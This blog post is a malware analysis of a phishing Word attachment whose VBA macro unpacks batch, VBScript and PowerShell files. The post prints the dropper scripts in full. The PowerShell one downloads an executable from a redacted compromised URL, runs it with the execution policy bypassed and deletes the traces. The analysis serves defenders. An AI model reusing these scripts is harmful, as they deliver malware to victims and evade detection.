Tribal Chicken

Security. Malware Research. Digital Forensics.

A look inside a malicious macro

An interesting sample landed in my samples database the other day. It’s an email with a word document attached. The email, as usual, claims that this company has found discrepancies on some transactions, and needs you to read the document to verify these transactions.

Screen Shot 2015-02-11 at 9.30.19 pm

This attached file contains a malicious Visual Basic macro which, if allowed to execute, will act as a trojan dropper (I have not yet analysed the dropped file).

Of course, any recent version of Microsoft Office has protections built in. By default, it will not allow any macro to automatically execute. To combat this, the malicious document employs further social engineering to coerce the victim into allowing the macro to run:

Screen Shot 2015-02-11 at 10.22.47 pm

Following the instructions will allow the macro to execute. Not really ideal. Once executed, to avoid hinting at infection, the macro will remove the “instructions” and replace them with this message:

Screen Shot 2015-02-11 at 9.28.14 pm

So what does it do? In order to figure this out, we can take a look at the contents of the macro. Unfortunately, the macro itself is password protected, so that first needs to be removed (which I won’t go into).

Once the protection is removed, we can easily see what the macro is doing:

Screen Shot 2015-02-11 at 10.27.21 pm

The function of the evil macro is actually quite simple. Its main function is to unpack  a Powershell script – The PS script then goes out and drops another malicious file onto the machine for execution.

Let’s take a look at how this happens.

The first section builds several variables containing the paths of the output files of the unpacker. It employs some basic obfuscation in an attempt to:

  • Avoid detection by the untrained human eye.
  • Evade automatic analysis attempts.

Screen Shot 2015-02-11 at 10.36.21 pm

The above looks messy, but de-obfuscated it basically translates to these paths:

Screen Shot 2015-02-11 at 10.39.01 pm

The resulting string is the location it will dump the files, depending on your version of Windows. If the operating system is Windows Vista or above, it will finally end up executing the PowerShell script. If below Windows Vista, it will use a VB Script to achieve the same goal.

This logic is evident in the next section of the macro, where the files are written:

Screen Shot 2015-02-11 at 10.53.07 pm

So here the macro gets the running version of Windows and compares the version number. Vista is 6.0, so for Win XP it will write a different set of files (Due to the use of PowerShell, which isn’t available in XP).

There a quite a few lines after this. The macro will write the contents of the above files line-by-line. Three files will be created on Windows Vista and above (In this case I am testing on Windows 7):

  • adobeacd-update.bat
  • adobeacd-update.ps1
  • adobeacd-update.vbs

Only two files will be created on Windows XP.

Once extracted on Windows 7, the macro will call the above Batch (.bat) script. Once called, the macro will go on to delete the previous “instructions” and replace them with the error message seen earlier in the article. This error message was actually in the document the whole time, just coloured as white text, so seemingly invisible.

Screen Shot 2015-02-11 at 11.02.35 pm

Our evil macro has just unpacked three scripts and executed one of them… but why?

As mentioned above, the batch file is executed. The batch file runs a quick ping, changes the code page to 1251 (Cyrillic – Slavic) then executes the unpacked VBScript file… Again employing crude obfuscation to presumably disguise the fact it’s a .vbs file from automated analysis systems.

Here is the contents of the batch file:

@echo off 
ping -n 2 
chcp 1251 :csakclasjdklas 
set Var1="." 
set Var2="v" 
set Var3="bs" 
cscript.exe "c:\Users\Supreme Overlord\AppData\Local\Temp\adobeacd-update"%Var1%%Var2%%Var3%

The VBScript  does not do much, but simply call the PowerShell script:

Dim dff dff = 68 
currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
currentFile = "C:\Users\Supreme Overlord\AppData\Local\Temp\adobeacd-update"&"."&"p"&"s1"
Set objShell = CreateObject("")
objShell.Run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true

The PS script is where the magic happens. The PowerShell script hits out to a hardcoded URL (a compromised web server) and downloads a file (also hardcoded).

Once downloaded the PS script will execute the dropped file, before finally deleting the dropped file, as well as the 3 scripts used to perform the dropping.

Here is the PS Script:

$down = New-Object
$url = 'http://[REDACTED].com/tmp/tak.exe';
$file = 'c:\Users\Supreme Overlord\AppData\Local\Temp\444.exe';
$down.headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25'+'';
$ScriptDir = $MyInvocation.ScriptName;
$someFilePath = 'c:\Users\Supreme Overlord\AppData\Local\Temp\444.exe';
$vbsFilePath = 'c:\Users\Supreme Overlord\AppData\Local\Temp\adobeacd-update'+'.'+'v'+'bs';
$batFilePath = 'c:\Users\Supreme Overlord\AppData\Local\Temp\adobeacd-update'+'.'+'b'+'at';
$psFilePath = 'c:\Users\Supreme Overlord\AppData\Local\Temp\adobeacd-update'+'.'+'p'+'s1';
Start-Sleep -s 15;
cmd.exe /c 'c:\Users\Supreme Overlord\AppData\Local\Temp\444.exe';
$file1 = gci $vbsFilePath -Force $file2 = gci $batFilePath -Force $file3 = gci $psFilePath -Force
If (Test-Path $vbsFilePath){
    Remove-Item $vbsFilePath
If (Test-Path $batFilePath){
    Remove-Item $batFilePath
If (Test-Path $someFilePath){
    Remove-Item $someFilePath
Remove-Item $MyInvocation.InvocationName

At this point our evil macro has finished it’s job and the file it dropped onto the machine is now running. The analysis of that file will need to wait until next time.

As you can see malicious macros embedded in MS Office documents are still alive and well, so care should be taken when opening documents from unknown sources, and not to disable the built in protection mechanisms.

Feel free to contact me with any feedback.